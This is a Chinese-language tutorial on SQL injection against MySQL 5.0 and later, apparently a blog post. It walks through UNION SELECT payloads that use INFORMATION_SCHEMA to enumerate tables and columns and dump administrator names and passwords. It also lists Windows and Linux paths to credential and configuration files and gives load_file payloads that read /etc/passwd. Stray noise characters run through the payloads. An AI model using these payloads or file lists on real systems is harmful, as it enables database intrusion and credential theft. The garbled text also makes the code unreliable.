mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。



Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
( h# K8 y/ N7 C* I* o|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称
4 n2 b1 o* p( }6 Y7 }8 _
  F4 L/ P+ _1 p0 H5 C% L: h+ U|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
! H0 M7 h. b( d7 M, D
|COLUMNS ->存储的字段名表
+ `" `. w1 }4 [% a|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称
% P7 T: @! q* w2 l. w
|—字段：COLUMN_NAME ->该字段的名称
7 \, {' S* ~5 G2 I& |
#########################################################################
* b1 l& P3 F/ F##
) M) w6 p" v, y, T5 w5 q
9 ?' u* [! p0 _6 L1 ~0×001 获取系统信息:
" a( J5 b, Z+ j2 t
- |5 k6 l0 _% z6 k! yunion select 1,2,3,4,5,concat
- A7 d- l# j. P  A: {(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
$ Q9 n# r* W# V, |0 b% w(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
# O+ k2 a! P( Y: n. u% F
/*

; K# h# @" }8 b$ I! J; ], O% D@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
% z$ j$ l/ h* u  j7 B4 [: g6 Ddatabase() 当前数据库名称
# b; d3 Q% L+ u0 S0x3c62723e 换行HEX值
( @7 Z" ~8 v. S- b2 [! C  x0 {- M/ M
*/

######################################################################

; `" ?9 ~0 O' R' }3 z5 n1 }* B0×002 获取表名
( I  j! `' u- e+ \
; Q7 X! t* d+ Junion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
! M- U( {& G) Zinformation_schema.tables where table_schema=0x67617264656e /*

/*

: e4 \: s: q- [' P8 R% A" i8 }0x67617264656e 为当前数据库名
7 H  @& m, q  _# G" J: c
3 j. N- D0 W6 D* f5 Agroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名

( z" `2 u( V0 |: p' c  |, T*/

: t) W% E' M. q& Y. W& w######################################################################

0×003 获取字段

. t: L! w# H- F' ^1 j; J$ ?union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and

0 F& ^  B/ N, h6 v* w7 i/ |( A
9 P$ N: p1 j9 ztable_schema=0x67617264656e limit 1 /*
9 ]3 x) S. ^& w$ ]9 d
2 ]% c( K* k- M" ~& p  m. h# Y/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
9 N8 ]+ Y+ ^: x3 f( W8 f
0x67617264656e ->数据库名

+ x- c( ~4 @% w5 p*/
2 g& g3 I4 O, }. ?5 K
#####################################################################
$ c# D; ]! R* w
8 C- Q' _. l, x% e4 P: A0×004 获取数据

union select 1,2,3
7 H% Q! B6 F: Q# K) \: Q4 d2 ~8 v! s+ ^,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
( _8 N$ A( R5 ~8 ~4 B# C
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
6 w2 {. [  u# R0 }# X; L(adpassword),6,7,8 from admin
+ W5 }- |# I6 y* V. w! Y! |$ k
/*

0x3c62723e 换行符号HEX编码

6 y1 |9 M' @2 Q% n4 ~9 c) z, |4 ogroup_concat 同时获得该字段所有数据
  M" |& Z  V. e$ d
$ I2 ~) v8 Y2 `0 Q- ?0 l*/


' F# R+ c% q2 Z* J6 e

2 w1 K3 l3 o; ^6 A# F% C: f6 U
4 H: N' J# J' V0 D: d0 N顺便添加一些mysql注入时非常有用的一些东西
9 H- _/ X; C4 N4 m
简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
8 x( \0 M; [' h% }( [
+ Z9 S7 O) s8 L& n9 |1:system_user() 系统用户名
7 i" O! M; ?* Z9 K2 W( L2:user()        用户名
8 m6 X! v, C: p2 Y( J# f' S" E! I3:current_user()  当前用户名
4:session_user()连接数据库的用户名
, u+ i5 T+ [/ D, `8 |5 d5:database()    数据库名
. \% F; p4 R- A" k7 j! t8 y( j6:version()     MYSQL数据库版本
( ~" E! l; E+ F' x. B7:load_file()   MYSQL读取本地文件的函数
5 `& l( M. G6 D8@datadir     读取数据库路径
% O) O- k5 Q5 ^3 R3 C+ |* i9@basedir    MYSQL 安装路径
  Q% @+ o6 f% }2 s% u7 v9 ^$ @10@version_compile_os   操作系统  Windows Server 2003,
5 y- ^1 V1 d, D8 Q! n收集的一些路径：
WINDOWS下:
6 i) W; O; ?# d3 L( H$ V. Y; B) gc:/boot.ini          //查看系统版本
; W2 i0 [/ @3 E" ]+ X& pc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
4 y+ p. Y0 T6 F* F: b  Z2 {; Bc:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
6 C5 M! M& R) a+ O7 mc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
3 b! C2 K+ b$ a; z. o4 {$ [$ Kc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
/ o% l9 b- Q" [: h//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
, J4 _, e2 _& `- h! F* U% Yc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.

% P, f' N% e7 G1 }' f
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
! U1 b- W6 f7 D( {4 N! B& [c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
' p/ _4 W/ W9 \& wC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
3 u6 w# ?! D4 R( a, J. `
+ V: |. @: i) p5 J) m, pLUNIX/UNIX下:
$ f/ E2 j1 ]- E% I! \5 Z, m% c/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/ ?: R/ ^' {9 a$ J3 L) M/ |. J1 ~/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
5 ?. T5 M6 `! p) \  g7 ^/etc/httpd/conf/httpd.conf // apache配置文件
7 M) F9 a4 b0 p# T/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
9 u6 M2 ~& G0 j  ?( ^0 @$ t. j/etc/redhat-release //系统版本
/etc/issue
! ]1 E+ O0 d, S3 e! n2 W: z* {) X/etc/issue.net
+ }, P  L2 ~3 c  s1 N9 k5 ?/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
$ G9 \" g0 t/ I1 O8 U* |( N1 d/ x/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
" f# A- o9 m- |! h0 y/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
6 }  H; y) p: r6 R/ @/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
6 W$ d& u/ h5 S7 r& b) ~replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
# h+ W( w6 P! c2 j. N9 Y5 [
0 p6 Y, l, h; I